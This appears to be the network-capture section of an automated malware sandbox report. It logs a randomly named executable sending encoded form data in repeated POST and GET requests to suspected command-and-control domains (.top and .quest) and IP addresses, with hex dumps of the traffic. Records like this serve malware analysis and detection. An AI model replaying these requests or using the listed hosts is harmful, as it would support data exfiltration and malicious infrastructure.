69 38 4b 47 6e 6e 39 77 73 64 33 2b 39 43 6a 61 4c 32 43 7a 53 41 4c 33 79 68 41 70 4e 50 52 73 45 44 62 4c 56 65 76 6a 73 67 65 45 6b 4b 44 48 31 41 4c 30 4a 39 69 58 35 67 65 55 67 2b 51 6f 2f 6c 36 52 61 48 6c 42 34 53 78 66 64 33 62 48 67 3d 3d Data Ascii: Jz1hrtoh=/vYxQq8df91XD/OL8stXTAxECAMd8Ke3QDNjZoUT3mdvc04sjSgOnpeYkvaDzUIMyXj40FiEaHQa4uzjCiLxSpfaW16sEFhhZ40fi5KFfKDa9VlnUi8KGnn9wsd3+9CjaL2CzSAL3yhApNPRsEDbLVevjsgeEkKDH1AL0J9iX5geUg+Qo/l6RaHlB4Sxfd3bHg==
Jan 7, 2025 12:24:19.393573999 CET	691	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Tue, 07 Jan 2025 11:24:19 GMT Server: nginx Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50016	134.122.135.48	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:21.070374012 CET	848	OUT	POST /4uqm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.x3kwqc5tye4vl90y.top Content-Length: 225 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.x3kwqc5tye4vl90y.top Referer: http://www.x3kwqc5tye4vl90y.top/4uqm/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 2f 76 59 78 51 71 38 64 66 39 31 58 46 76 2b 4c 78 72 5a 58 55 67 78 46 66 77 4d 64 31 71 65 72 51 44 52 6a 5a 70 52 4d 30 55 70 76 63 51 38 73 73 33 55 4f 71 4a 65 59 76 50 62 48 2b 30 49 54 79 58 65 48 30 42 69 45 61 48 30 61 34 76 44 6a 43 31 58 79 55 70 66 63 50 46 36 35 4b 6c 68 68 5a 34 30 66 69 35 75 76 66 4b 4c 61 38 6c 31 6e 56 44 38 4a 46 6e 6e 38 68 73 64 33 36 39 44 71 61 4c 32 73 7a 51 6b 31 33 77 5a 41 70 4f 62 52 69 77 33 45 43 56 65 6c 73 4d 68 61 44 45 2f 71 4b 48 35 74 30 2f 6c 46 57 34 6f 39 59 47 7a 4b 35 4f 45 74 44 61 6a 57 63 2f 62 46 53 65 4b 53 63 74 69 49 47 75 7a 6e 77 74 72 36 64 53 59 2f 34 55 34 32 2b 71 63 3d Data Ascii: Jz1hrtoh=/vYxQq8df91XFv+LxrZXUgxFfwMd1qerQDRjZpRM0UpvcQ8ss3UOqJeYvPbH+0ITyXeH0BiEaH0a4vDjC1XyUpfcPF65KlhhZ40fi5uvfKLa8l1nVD8JFnn8hsd369DqaL2szQk13wZApObRiw3ECVelsMhaDE/qKH5t0/lFW4o9YGzK5OEtDajWc/bFSeKSctiIGuznwtr6dSY/4U42+qc=
Jan 7, 2025 12:24:21.946820974 CET	691	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Tue, 07 Jan 2025 11:24:21 GMT Server: nginx Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50017	134.122.135.48	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:23.619436979 CET	10930	OUT	POST /4uqm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.x3kwqc5tye4vl90y.top Content-Length: 10305 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.x3kwqc5tye4vl90y.top Referer: http://www.x3kwqc5tye4vl90y.top/4uqm/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 2f 76 59 78 51 71 38 64 66 39 31 58 46 76 2b 4c 78 72 5a 58 55 67 78 46 66 77 4d 64 31 71 65 72 51 44 52 6a 5a 70 52 4d 30 55 78 76 62 6a 6b 73 74 51 34 4f 72 4a 65 59 6d 76 62 45 2b 30 49 61 79 58 47 44 30 42 6d 36 61 46 38 61 37 4e 4c 6a 56 33 2f 79 42 5a 66 63 53 31 36 74 45 46 68 77 5a 38 6f 54 69 35 2b 76 66 4b 4c 61 38 67 35 6e 53 53 38 4a 49 48 6e 39 77 73 64 4e 2b 39 44 43 61 4c 75 61 7a 51 78 4f 33 67 35 41 6e 49 37 52 67 46 44 45 65 46 65 72 74 4d 68 38 44 45 6a 78 4b 48 6c 32 30 2f 35 2f 57 34 73 39 49 79 75 31 68 71 30 62 55 34 6d 4f 65 34 79 6c 53 75 71 51 58 2f 4b 33 41 62 6a 77 71 4e 58 78 66 41 56 42 38 56 34 46 68 63 51 52 78 66 4f 72 45 66 76 6a 2b 72 6e 63 74 6f 2f 4e 47 69 55 67 4e 52 43 42 41 50 72 66 64 36 34 52 46 36 4b 47 72 2b 44 31 46 2b 5a 38 48 7a 48 6a 4d 4b 50 78 32 78 6c 54 39 31 51 64 4f 4f 36 76 7a 7a 4e 71 44 4e 4e 7a 6d 45 4d 37 49 32 44 69 75 66 69 56 6d 4a 6b 68 78 65 6c 39 72 46 4e 64 52 54 6f 77 2b 59 42 4d 62 62 41 32 52 34 62 43 43 [TRUNCATED] Data Ascii: Jz1hrtoh=/vYxQq8df91XFv+LxrZXUgxFfwMd1qerQDRjZpRM0UxvbjkstQ4OrJeYmvbE+0IayXGD0Bm6aF8a7NLjV3/yBZfcS16tEFhwZ8oTi5+vfKLa8g5nSS8JIHn9wsdN+9DCaLuazQxO3g5AnI7RgFDEeFertMh8DEjxKHl20/5/W4s9Iyu1hq0bU4mOe4ylSuqQX/K3AbjwqNXxfAVB8V4FhcQRxfOrEfvj+rncto/NGiUgNRCBAPrfd64RF6KGr+D1F+Z8HzHjMKPx2xlT91QdOO6vzzNqDNNzmEM7I2DiufiVmJkhxel9rFNdRTow+YBMbbA2R4bCC0mqA32gbFv63MEBYEOB7E03Gnd/5CBkzZc2ji4t+0b947UltSsrg/7YUfcBD/OA4fkHwoRMslwOxA5E0S+QRGN3MeB5b6SM1PLE+434nLyH0m7iVc1+ywVefP6J6LC7heZTy/MTvFEKdX3n6364QyfltgVsDqlWXFvRrfGsB2bM1Q4mNj8DsBpVS1c70tJbQmmQnTcIVtW23D3+JjDyJqYijQ0qEr5HMNvLk7IegmrepDajQM8pboYNOFHpP3fiZQT8W0AgO7OvRrIf2k5aCg0nwsN9/sgbNCfMK2+o55p4jghyWt4m5sjmyaK3aBCt83nj/xVvddfHK8oL8D9hI7JybOqaCHXHDTsbrT2YAmalTwVfe/oxJ61diRxCB1pjaF/YychOKKbMS99eCicmpGjszgE+7WZeQFEBMpYE9ctof+GFqi7RGEBohO6//M7xjfsYJNYD3zhSeH6QitOBLyrPl0n3qJb/YUuKsjP4wqbC1/fuwbC6cf5oOqIXsVO1uGyJFxYwnpGM5Xr7zNpq8mA3qMJCYf0s7UYkTPw/Iboo887k2P5YivWKKqFUi4s8aizLeXJZA06rqrsbdXoNJct5N72TeYZGpIxhBGJ6UNzEyKsTMP3efJcfag/5bIiZbf+2mbE8QRcYsTqPc2i/Taq1MskDcARvo27 [TRUNCATED]
Jan 7, 2025 12:24:24.468095064 CET	691	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Tue, 07 Jan 2025 11:24:24 GMT Server: nginx Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50018	134.122.135.48	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:26.157069921 CET	550	OUT	GET /4uqm/?Jz1hrtoh=ytwRTflRS7QAauuT+rgNUjccAkdy+e6lNAEJLLU2j1RodgpxpA5TvYH+ibGN3Boi82rz2U+CRnlw4tfWTnizPbPVR1zxex5DTfgIhP2VJOetwh1VZXY8GHE=&UdJ=uBcLexhXPjVX9H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Host: www.x3kwqc5tye4vl90y.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Jan 7, 2025 12:24:27.024055004 CET	691	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Tue, 07 Jan 2025 11:24:26 GMT Server: nginx Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50019	172.67.148.216	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:32.216649055 CET	822	OUT	POST /c83d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.overlayoasis.quest Content-Length: 205 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.overlayoasis.quest Referer: http://www.overlayoasis.quest/c83d/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 75 7a 37 54 58 54 39 64 47 4f 64 33 30 35 62 78 74 53 33 50 49 35 46 64 61 4c 56 55 45 59 39 2b 73 48 7a 39 31 50 6c 35 58 44 4a 6b 65 74 6b 79 47 34 37 62 63 50 6a 65 67 32 31 79 74 69 77 49 49 34 65 46 62 2f 36 64 70 4d 31 6f 7a 59 5a 65 72 5a 76 62 6c 43 4e 59 31 44 50 37 30 39 4a 6b 6e 47 6a 46 7a 51 6f 4f 43 36 31 42 75 47 34 35 45 79 43 56 30 61 32 33 31 72 78 62 49 59 57 59 68 57 56 52 52 2b 48 72 37 67 62 67 31 52 6a 55 33 51 4f 73 56 50 4a 2b 6d 65 39 36 56 4a 47 4e 32 6d 64 2f 76 78 62 2b 4d 36 32 58 66 4d 2b 47 2f 54 61 30 58 72 4c 70 54 6e 57 4c 66 68 72 77 52 41 3d 3d Data Ascii: Jz1hrtoh=uz7TXT9dGOd305bxtS3PI5FdaLVUEY9+sHz91Pl5XDJketkyG47bcPjeg21ytiwII4eFb/6dpM1ozYZerZvblCNY1DP709JknGjFzQoOC61BuG45EyCV0a231rxbIYWYhWVRR+Hr7gbg1RjU3QOsVPJ+me96VJGN2md/vxb+M62XfM+G/Ta0XrLpTnWLfhrwRA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50020	172.67.148.216	80	5004	C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:24:34.907140970 CET	842	OUT	POST /c83d/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.overlayoasis.quest Content-Length: 225 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.overlayoasis.quest Referer: http://www.overlayoasis.quest/c83d/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Data Raw: 4a 7a 31 68 72 74 6f 68 3d 75 7a 37 54 58 54 39 64 47 4f 64 33 31 64 6e 78 69 51 66 50 42 35 46 43 45 62 56 55 4e 34 39 69 73 48 2f 39 31 4e 4a 51 58 52 39 6b 51 74 30 79 48 35 37 62 64 50 6a 65 75 57 31 7a 6a 43 77 35 49 34 53 33 62 39 75 64 70 4d 68 6f 7a 61 42 65 33 36 33 59 6d 79 4e 61 75 7a 50 39 70 74 4a 6b 6e 47 6a 46 7a 51 38 6f 43 36 39 42 76 32 49 35 46 57 75 57 6f 4b 32 30 79 72 78 62 66 49 57 69 68 57 56 2f 52 38 2f 42 37 6a 7a 67 31 56 6e 55 33 44 57 72 63 50 4a 34 73 2b 38 61 59 35 62 35 76 44 73 57 6d 53 6a 63 4b 4c 4b 48 65 4b 7a 63 75 69 37 6a 46 72 76 61 4f 67 66 2f 53 69 57 35 4b 49 2b 35 68 6c 4d 6d 30 59 65 4f 73 74 32 55 52 47 56 6f 58 74 77 3d Data Ascii: Jz1hrtoh=uz7TXT9dGOd31dnxiQfPB5FCEbVUN49isH/91NJQXR9kQt0yH57bdPjeuW1zjCw5I4S3b9udpMhozaBe363YmyNauzP9ptJknGjFzQ8oC69Bv2I5FWuWoK20yrxbfIWihWV/R8/B7jzg1VnU3DWrcPJ4s+8aY5b5vDsWmSjcKLKHeKzcui7jFrvaOgf/SiW5KI+5hlMm0YeOst2URGVoXtw=
Jan 7, 2025 12:24:36.281416893 CET	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 11:24:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://overlayoasis.quest/wp-json/>; rel="https://api.w.org/" vary: accept-encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZZWJmfp5BdKD9Ev%2BCaiNIRoC2p8S5kXmjEJeFkY66fWkNXIC8sjBD7g5YpBQ22pT4HBj1gazj%2BpouBegtNfKtXxv2EVFHBJCPw4lHH2fNB%2BBNnCJIjK%2FHqVYm9d6d26IB81UqgrfBBXo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe395101e564379-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2232&min_rtt=2232&rtt_var=1116&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=842&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 64 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6d 73 e3 b6 d5 e8 67 7b 26 ff 01 cb 9d ac a5 84 84 f8 a6 57 5b ce 93 6e 92 a7 bd d3 34 99 6c d2 ce ed ee 5e 0d 44 42 12 77 29 92 25 20 c9 ae eb ff 7e e7 00 20 45 4a a4 44 59 de 24 9d 49 da 95 49 e0 bc 01 38 38 00 0e 0e 40 84 10 ba 79 f1 cd 0f af 7f fe bf 3f 7e 8b 16 7c 19 de 7e 76 89 20 11 9e 51 48 a2 f9 58 a3 91 f1 cb 1b 2d cf a0 c4 47 01 a7 4b e6 c5 09 15 4f fc 3e a1 63 6d c1 79 32 ea 74 98 b7 a0 4b 82 e3 74 de f9 07 9d be 09 38 05 d4 0b 81 bb a4 9c 20 6f 41 52 46 f9 58 fb e5 e7 ef 8c 41 4e 57 e4 45 64 49 c7 da 3a a0 9b 24 4e b9 86 bc 38 e2 34 e2 63 6d 13 f8 7c 31 f6 e9 3a f0 a8 21 5e 74 14 44 01 0f 48 68 30 8f 84 74 6c e5 94 c2 20 fa Data Ascii: 2da9}msg{&W[n4l^DBw)% ~ EJDY$II88@y?~\|~v QHX-GKO>cmy2tKt8 oARFXANWEdI:$N84cm\|1:!^tDHh0tl
Jan 7, 2025 12:24:36.281435013 CET	1236	IN	Data Raw: 88 52 1a 8e b5 24 8d 67 41 48 35 b4 48 e9 2c 97 70 be 4c e6 42 be bb 59 d4 b1 b6 78 3c e0 21 bd fd 91 cc 29 8a 62 8e 66 f1 2a f2 d1 ab 97 03 db b2 ae 51 bc a6 69 48 ee 63 c2 02 86 ff b5 a2 8c df 74 24 c2 65 41 f4 ab 34 9e c6 9c 5d e5 82 5f 2d c9 Data Ascii: R$gAH5H,pLBYx<!)bfQiHct$eA4]_-,IJ`sz:76XGke)kdcu$SL!mDF4X6BiMGR1dFr3<yHI0K!a.IiN5$$IxqInjHTX-%Z
Jan 7, 2025 12:24:36.281446934 CET	1236	IN	Data Raw: 83 59 4b 8b a7 1f a8 c7 b5 71 56 4f f4 d5 2b 2d 5a 2d a7 34 2d a4 e1 7c f8 79 f5 aa 6a fc b9 29 40 7c d9 33 dd 81 69 be 7a b5 4f 1a 17 07 b5 76 ae 2b c5 d4 c2 e0 94 d9 c4 55 18 3e b6 84 b0 2f a2 f6 03 c8 5c db 8b 5e bd aa ca db e9 28 d5 40 bf fc Data Ascii: YKqVO+-Z-4-\|yj)@\|3izOv+U>/\^(@W~J~*?n-2F}9<~#VK}vgfm}U{!k/vZSN@7hUM-{AEp-eEZD`j:k1}
Jan 7, 2025 12:24:36.281478882 CET	1236	IN	Data Raw: bb 58 03 d0 30 bd 36 72 b3 34 67 a0 bb ae 54 8f 5e 96 06 c8 66 57 1f 0e da 68 90 a7 b9 ba ed 0e f4 fe d1 ea 9b 86 2b b6 50 f5 77 bc cb 88 a6 b2 cd 9e 6e 3b bd 82 f4 36 b8 5b 74 db 35 9b 71 13 03 3e 59 dd 1d e1 e4 ea b6 d9 d5 ad 5e 77 ab 14 5d 57 Data Ascii: X06r4gT^fWh+Pwn;6[t5q>Y^w]Wwmnb-q8`-^Wc-le#@u--mC{581ixa-4rDc[Q5Z~$xnknM5`K#d9]=Ly!(7BN]`
Jan 7, 2025 12:24:36.281491995 CET	896	IN	Data Raw: cb af e4 b6 f7 f8 7b c8 a7 69 4a f8 e7 ce d7 b0 e1 6f bf b6 c5 af 23 7e 53 3a 5f 85 24 fd dc 7e dd 15 ef 3d f1 db 17 bf 03 f1 3b 14 bf 96 69 06 9c 84 81 27 f1 f3 67 a7 f0 9c 3f 74 0b 89 bd c2 73 bf f0 3c 28 3c 0f f3 e7 fe eb d7 71 ba 84 29 39 ff Data Ascii: {iJo#~S:_$~=;i'g?ts<(<q)9IJq\|d([\yKPT?}\|{&u'M=a&?_>d"trw)JwA6bE#7<)1tIB+"]^\(]^(Hox4xAW`C
Jan 7, 2025 12:24:36.281502008 CET	1236	IN	Data Raw: 86 d4 57 3a cb 03 ef e3 bd 01 6e ba 54 f6 0d e2 f1 60 4d db 08 7b 61 cc 68 09 6a 4a d2 4c af 65 3a f4 ac a2 c8 d2 6c 11 35 e5 a9 03 91 f5 2a e4 43 b7 88 1c 86 2b 95 a4 16 2a ab 4a 03 1a 4e 84 41 1e a7 9c e1 08 15 9c 9c 86 23 f9 c0 15 09 30 e2 9c Data Ascii: W:nT`M{ahjJLe:l5C+JNA#0koN;7b,`obKd5)$dzfO\u<A&RJj9H3KqZ3)2\|2LjT*dPfe@JT9Gr\|Tdak
Jan 7, 2025 12:24:36.281512976 CET	1236	IN	Data Raw: 5a 9e 85 dd a1 6b 74 71 d7 ed eb 5d 6c d9 96 d1 c7 fd ae ad 0f 71 d7 31 86 d8 74 6c 82 bb 56 17 fe 29 74 ec 74 7b 06 ee f6 86 a1 81 fb 96 65 b8 d8 35 87 cc c0 66 df 32 64 5e cf 35 b0 3d 70 5f 77 4d 6c da 70 fb 1c ee e9 ce 10 f7 2d 5b 77 ba d8 d6 Data Ascii: Zktq]lq1tlV)tt{e5f2d^5=p_wMlp-[w][wuw-ka{6=KY?tea(ao6S(mo5OV=P=&]]mk(e<>+p_w@4OO)cc;PYaGBO
Jan 7, 2025 12:24:36.281523943 CET	1236	IN	Data Raw: 84 80 08 88 8e 03 17 f1 d1 b8 3e 11 fe 57 79 e0 e9 78 54 66 45 7b 35 40 2a 3a c4 9a 63 09 57 d8 93 c2 40 4b 91 25 27 a2 16 65 3d 15 b7 da 79 97 f9 e1 7f 37 cd fc b4 0e fe d4 ee 79 4a c7 ac 8c 2c dc ab b7 29 58 0f 2f 5d 2d a7 79 5c 6b 39 24 b7 02 Data Ascii: >WyxTfE{5@:cW@K%'e=y7yJ,)X/]-y\k9$`pI=,Auler:BcBv'SO{jHYNUX::>?QUzb<G@Dd5prlLSrTcA22-je+jdh)'*bD7dNT
